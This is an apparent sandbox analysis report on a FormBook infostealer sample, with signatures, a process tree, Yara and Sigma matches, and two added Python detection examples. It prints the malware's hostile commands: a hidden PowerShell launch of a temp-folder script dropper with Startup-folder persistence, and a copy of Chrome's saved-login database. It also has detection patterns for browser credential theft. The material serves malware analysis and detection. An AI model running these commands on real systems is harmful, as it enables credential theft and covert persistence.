
Analysis Report f5cZJ0WC0H

Overview

General Information

Sample Name: f5cZJ0WC0H (renamed file extension from none to exe)
Analysis ID: 323830
MD5: 0e7d12ad28411f68d62d3d3f17382b98
SHA1: 742c7b23f14ebe783cdef406b073c6e867266657
SHA256: 0f26e91c2b802ec98ff2cc6269ad43f09f29e8827d2975f4e6514db0df14db6c
Tags: formbook


Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected FormBook malware
Malicious sample detected (through community Yara rule)
Sigma detected: Steal Google chrome login data
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
.NET source code contains potential unpacker
Binary contains a suspicious time stamp
Drops PE files to the startup folder
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses ipconfig to lookup or modify the Windows network settings
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Startup

  • System is w10x64
  • f5cZJ0WC0H.exe (PID: 6112 cmdline: 'C:\Users\user\Desktop\f5cZJ0WC0H.exe' MD5: 0E7D12AD28411F68D62D3D3F17382B98)
    • cmd.exe (PID: 4548 cmdline: cmd.exe /c timeout 5 & powershell -command Start-Process -WindowStyle hidden -FilePath 'C:\Windows\System32\wscript.exe' -ArgumentList 'C:\Users\user\AppData\Local\Temp\\863733.js'; Start-Sleep -s 5; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 5876 cmdline: timeout 5 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
      • powershell.exe (PID: 5972 cmdline: powershell -command Start-Process -WindowStyle hidden -FilePath 'C:\Windows\System32\wscript.exe' -ArgumentList 'C:\Users\user\AppData\Local\Temp\\863733.js'; Start-Sleep -s 5; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • wscript.exe (PID: 7028 cmdline: 'C:\Windows\System32\wscript.exe' C:\Users\user\AppData\Local\Temp\\863733.js MD5: 7075DD7B9BE8807FCA93ACD86F724884)
        • f5cZJ0WC0H.exe (PID: 1268 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe' MD5: 0E7D12AD28411F68D62D3D3F17382B98)
          • f5cZJ0WC0H.exe (PID: 6952 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe MD5: 0E7D12AD28411F68D62D3D3F17382B98)
            • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
              • help.exe (PID: 4724 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
                • cmd.exe (PID: 3884 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
                  • conhost.exe (PID: 6916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • autoconv.exe (PID: 5164 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
              • ipconfig.exe (PID: 5824 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
  • f5cZJ0WC0H.exe (PID: 6868 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe' MD5: 0E7D12AD28411F68D62D3D3F17382B98)
    • f5cZJ0WC0H.exe (PID: 852 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe MD5: 0E7D12AD28411F68D62D3D3F17382B98)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings

00000017.00000002.387510478.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000017.00000002.387510478.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000017.00000002.387510478.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18409:$sqlite3step: 68 34 1C 7B E1
  • 0x1851c:$sqlite3step: 68 34 1C 7B E1
  • 0x18438:$sqlite3text: 68 38 2A 90 C5
  • 0x1855d:$sqlite3text: 68 38 2A 90 C5
  • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000018.00000002.501338482.0000000000500000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000018.00000002.501338482.0000000000500000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(49 entries in total; the remaining entries are not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings

23.2.f5cZJ0WC0H.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
23.2.f5cZJ0WC0H.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a6e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
23.2.f5cZJ0WC0H.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x17609:$sqlite3step: 68 34 1C 7B E1
  • 0x1771c:$sqlite3step: 68 34 1C 7B E1
  • 0x17638:$sqlite3text: 68 38 2A 90 C5
  • 0x1775d:$sqlite3text: 68 38 2A 90 C5
  • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
21.2.f5cZJ0WC0H.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
21.2.f5cZJ0WC0H.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a6e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(7 entries in total; the remaining entries are not shown)
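
The two tables above list the same rule strings at two sets of offsets, and the byte patterns themselves carry information the report does not spell out. The following is an added example, not part of the Joe Sandbox report: it parses the match lines as printed above (the dump 00000017 and 23.2 unpack entries), decodes the three JPCERT `$sqlite3*` patterns as x86 `push imm32` instructions (opcode 68 followed by a little-endian dword, so `68 34 1C 7B E1` is `push 0xE17B1C34`), flags the `$sequence_*` pattern that contains the `rdtsc` opcode `0F 31` (`$sequence_0` decodes to `add ecx,eax; rdtsc; sub eax,ecx; mov [ebp-4],eax`, the timing measurement behind the report's RDTSC signature), and checks that every string sits at offsets that differ by one constant between the memory dump and the unpacked PE. Reading that constant shift as the same code seen in its in-memory layout and in the rebuilt file layout is my interpretation, not a statement from the report.

```python
"""Added example, not part of the Joe Sandbox report. Works over the Yara
match strings listed in the report's Memory Dumps and Unpacked PEs tables."""
import re

# Match lines copied from the report: memory dump 00000017 and 23.2 ... .unpack.
MEMORY_MATCHES = """
0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0x18409:$sqlite3step: 68 34 1C 7B E1
0x1851c:$sqlite3step: 68 34 1C 7B E1
0x18438:$sqlite3text: 68 38 2A 90 C5
0x1855d:$sqlite3text: 68 38 2A 90 C5
0x1844b:$sqlite3blob: 68 53 D8 7F 8C
0x18573:$sqlite3blob: 68 53 D8 7F 8C
"""
UNPACKED_MATCHES = """
0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
0x1a6e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0x17609:$sqlite3step: 68 34 1C 7B E1
0x1771c:$sqlite3step: 68 34 1C 7B E1
0x17638:$sqlite3text: 68 38 2A 90 C5
0x1775d:$sqlite3text: 68 38 2A 90 C5
0x1764b:$sqlite3blob: 68 53 D8 7F 8C
0x17773:$sqlite3blob: 68 53 D8 7F 8C
"""

LINE_RE = re.compile(r"^(0x[0-9a-fA-F]+):\$(\w+): ([0-9A-Fa-f ]+)$")


def parse_matches(text):
    """Return [(offset, string_name, pattern_bytes)] for each match line."""
    out = []
    for line in text.strip().splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            out.append((int(m.group(1), 16), m.group(2), bytes.fromhex(m.group(3))))
    return out


def decode_push_imm32(pattern):
    """x86 'push imm32' is opcode 0x68 followed by a little-endian dword."""
    if len(pattern) == 5 and pattern[0] == 0x68:
        return int.from_bytes(pattern[1:], "little")
    return None


def push_immediates(matches):
    """Map each $name whose pattern is a single 'push imm32' to its constant."""
    return {name: imm for _, name, pat in matches
            if (imm := decode_push_imm32(pat)) is not None}


def rdtsc_sequences(matches):
    """Names of patterns containing the rdtsc opcode 0F 31. This is a byte-level
    check; in general a hit could straddle an instruction boundary."""
    return {name for _, name, pat in matches if b"\x0f\x31" in pat}


def offset_deltas(mem, unp):
    """Pair identical (name, pattern) hits in offset order and collect the offset
    differences. A single value means every string moved by the same constant."""
    key = lambda t: (t[1], t[0])
    return {m[0] - u[0] for m, u in zip(sorted(mem, key=key), sorted(unp, key=key))
            if (m[1], m[2]) == (u[1], u[2])}


if __name__ == "__main__":
    mem, unp = parse_matches(MEMORY_MATCHES), parse_matches(UNPACKED_MATCHES)
    for name, imm in sorted(push_immediates(mem).items()):
        print(f"${name}: push 0x{imm:08X}")
    print("rdtsc in:", sorted(rdtsc_sequences(mem)))
    print("memory - unpacked offset deltas:", [hex(d) for d in offset_deltas(mem, unp)])
```

Run stand-alone it prints the three pushed constants, names `sequence_0` as the only rdtsc-bearing pattern, and reports a single delta of 0xe00 for all seventeen strings. If a future dump produced more than one delta, the two artefacts would not be the same code image and should not be compared offset-for-offset.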

Sigma Overview

System Summary:

Sigma detected: Steal Google chrome login data
Source: Process started
Author: Joe Security
Data:
  Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
  CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
  CommandLine|base64offset|contains:
  Image: C:\Windows\SysWOW64\cmd.exe
  NewProcessName: C:\Windows\SysWOW64\cmd.exe
  OriginalFileName: C:\Windows\SysWOW64\cmd.exe
  ParentCommandLine: C:\Windows\SysWOW64\help.exe
  ParentImage: C:\Windows\SysWOW64\help.exe
  ParentProcessId: 4724
  ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
  ProcessId: 3884

Sigma detected: WScript or CScript Dropper
Source: Process started
Author: Margaritis Dimitrios (idea), Florian Roth (rule)
Data:
  Command: 'C:\Windows\System32\wscript.exe' C:\Users\user\AppData\Local\Temp\\863733.js
  CommandLine: 'C:\Windows\System32\wscript.exe' C:\Users\user\AppData\Local\Temp\\863733.js
  CommandLine|base64offset|contains:
  Image: C:\Windows\SysWOW64\wscript.exe
  NewProcessName: C:\Windows\SysWOW64\wscript.exe
  OriginalFileName: C:\Windows\SysWOW64\wscript.exe
  ParentCommandLine: powershell -command Start-Process -WindowStyle hidden -FilePath 'C:\Windows\System32\wscript.exe' -ArgumentList 'C:\Users\user\AppData\Local\Temp\\863733.js'; Start-Sleep -s 5; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe'
  ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  ParentProcessId: 5972
  ProcessCommandLine: 'C:\Windows\System32\wscript.exe' C:\Users\user\AppData\Local\Temp\\863733.js
  ProcessId: 7028
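
The Startup tree and the two Sigma hits describe one chain: the sample spawns cmd.exe, which waits five seconds and hands PowerShell a hidden Start-Process of a .js file in %TEMP% followed by a hidden launch of the copy planted in the user's Startup folder; that copy injects into explorer.exe, explorer spawns help.exe, and help.exe runs `cmd /c copy` against Chrome's `Login Data`. The following is an added example, not part of the Joe Sandbox report: it replays those process-creation events, constructed here from the report's command lines with parent links taken from the tree, through three checks that mirror the two Sigma rules plus the hidden Startup-folder launch, and then walks the parent chain of each hit so the living-off-the-land lineage (cmd.exe under help.exe under explorer.exe) is visible. Image paths for the first cmd.exe and for explorer.exe are assumed, since the report gives only their names; the Edge and Brave profile paths and the drop-directory list are assumptions that generalise the Chrome case to other Chromium-based browsers and other user-writable staging folders.

```python
"""Added example, not part of the Joe Sandbox report: replays the report's
process-creation events through three detection checks and reconstructs the
parent chain of a hit. EVENTS is constructed from the report's Startup tree
and Sigma event fields, not taken from a real log."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str     # full path of the created process
    cmdline: str   # command line as logged (single quotes as in the report)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


PS_CHAIN = (r"powershell -command Start-Process -WindowStyle hidden -FilePath "
            r"'C:\Windows\System32\wscript.exe' -ArgumentList "
            r"'C:\Users\user\AppData\Local\Temp\\863733.js'; Start-Sleep -s 5; "
            r"Start-Process -WindowStyle hidden -FilePath "
            r"'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe'")
STARTUP_EXE = r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe"

# Image paths for PID 4548 (cmd.exe) and PID 3472 (explorer.exe) are assumed;
# the report gives only the executable name for those two.
EVENTS = [
    ProcEvent(6112, 0, r"C:\Users\user\Desktop\f5cZJ0WC0H.exe", r"'C:\Users\user\Desktop\f5cZJ0WC0H.exe'"),
    ProcEvent(4548, 6112, r"C:\Windows\SysWOW64\cmd.exe", "cmd.exe /c timeout 5 & " + PS_CHAIN),
    ProcEvent(5972, 4548, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", PS_CHAIN),
    ProcEvent(7028, 5972, r"C:\Windows\SysWOW64\wscript.exe",
              r"'C:\Windows\System32\wscript.exe' C:\Users\user\AppData\Local\Temp\\863733.js"),
    ProcEvent(1268, 5972, STARTUP_EXE, "'" + STARTUP_EXE + "'"),
    ProcEvent(6952, 1268, STARTUP_EXE, STARTUP_EXE),
    ProcEvent(3472, 6952, r"C:\Windows\explorer.exe", ""),
    ProcEvent(4724, 3472, r"C:\Windows\SysWOW64\help.exe", r"C:\Windows\SysWOW64\help.exe"),
    ProcEvent(3884, 4724, r"C:\Windows\SysWOW64\cmd.exe",
              r"/c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' "
              r"'C:\Users\user\AppData\Local\Temp\DB1' /V"),
    ProcEvent(5824, 3472, r"C:\Windows\SysWOW64\ipconfig.exe", r"C:\Windows\SysWOW64\ipconfig.exe"),
]

# Chromium profile layout shared by Chrome, Edge and Brave. The Edge/Brave
# entries are an assumed generalisation; the report only shows Chrome.
LOGIN_DATA_RE = re.compile(
    r"\\(Google\\Chrome|Microsoft\\Edge|BraveSoftware\\Brave-Browser)\\User Data\\.{0,40}?Login Data",
    re.IGNORECASE)
BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Assumed user-writable drop directories; extend for your own estate.
DROP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\|\\Users\\Public\\", re.IGNORECASE)


def browser_login_data_access(ev):
    """A process other than the browser itself naming a Chromium 'Login Data' file."""
    return basename(ev.image) not in BROWSERS and LOGIN_DATA_RE.search(ev.cmdline) is not None


def script_host_from_drop_dir(ev):
    """wscript/cscript handed a script that lives in a drop directory."""
    return basename(ev.image) in SCRIPT_HOSTS and DROP_DIR_RE.search(ev.cmdline) is not None


def hidden_startup_launch(ev):
    """PowerShell hiding a Start-Process of something in the user's Startup folder."""
    cl = ev.cmdline.lower()
    return (basename(ev.image) in {"powershell.exe", "pwsh.exe"}
            and "start-process" in cl and "-windowstyle hidden" in cl
            and "\\start menu\\programs\\startup\\" in cl)


CHECKS = {f.__name__: f for f in (browser_login_data_access, script_host_from_drop_dir, hidden_startup_launch)}


def run_checks(events):
    """Sorted (check_name, pid) pairs for every event that trips a check."""
    return sorted((name, ev.pid) for ev in events for name, check in CHECKS.items() if check(ev))


def lineage(events, pid):
    """Image basenames from the given pid up to the root of the recorded tree."""
    by_pid = {ev.pid: ev for ev in events}
    chain = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain


if __name__ == "__main__":
    for name, pid in run_checks(EVENTS):
        print(f"{name}: pid {pid} <- " + " <- ".join(lineage(EVENTS, pid)[1:]))
```

The three hits land on PIDs 3884, 5972 and 7028, matching the report's two Sigma events plus the PowerShell persistence step the report shows in the tree but has no Sigma rule for. The lineage of 3884 (cmd.exe under help.exe under explorer.exe, with the sample's Startup-folder copy above that) is the part worth alerting on in production: help.exe has no business spawning cmd.exe, and that parent-child pair survives even if the attacker changes the Login Data copy command.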

Signature Overview

AV Detection:

Yara detected FormBook
Source: Yara match, File source: 00000017.00000002.387510478.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000018.00000002.501338482.0000000000500000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.247225412.00000000044D6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000018.00000002.504034660.00000000009B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.246128519.0000000004389000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000015.00000002.438245140.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000017.00000002.389389710.0000000001050000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000013.00000002.383962255.0000000003B52000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000013.00000002.383860155.0000000003AD6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000013.00000002.382240548.0000000003989000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000018.00000002.503765338.0000000000980000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000001F.00000002.439648635.00000000004C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000012.00000002.368138298.0000000003896000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000012.00000002.368427184.0000000003913000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000017.00000002.388561440.0000000000B40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000012.00000002.367211386.0000000003749000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000015.00000002.438147328.0000000000C40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 23.2.f5cZJ0WC0H.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 21.2.f5cZJ0WC0H.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 21.2.f5cZJ0WC0H.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 23.2.f5cZJ0WC0H.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: 23.2.f5cZJ0WC0H.exe.400000.0.unpack, Avira label: TR/Crypt.ZPACK.Gen
Source: 21.2.f5cZJ0WC0H.exe.400000.0.unpack, Avira label: TR/Crypt.ZPACK.Gen
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe:Zone.Identifier
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe, Code function: 4x nop then pop edi, 21_2_00417D4B

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.98.99.30:80 -> 192.168.2.5:49733
Source: unknown, DNS traffic detected: queries for: g.msn.com
Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://fontfabrik.com
Source: powershell.exe, 00000005.00000002.348999474.00000000064A3000.00000004.00000001.sdmp, String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.340189999.0000000005583000.00000004.00000001.sdmp, String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.340189999.0000000005583000.00000004.00000001.sdmp, String found in binary or memory: http://pesterbdd.com/images/Pester.pngd
Source: powershell.exe, 00000005.00000002.339869504.0000000005441000.00000004.00000001.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000005.00000002.340189999.0000000005583000.00000004.00000001.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000005.00000002.340189999.0000000005583000.00000004.00000001.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmld
Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
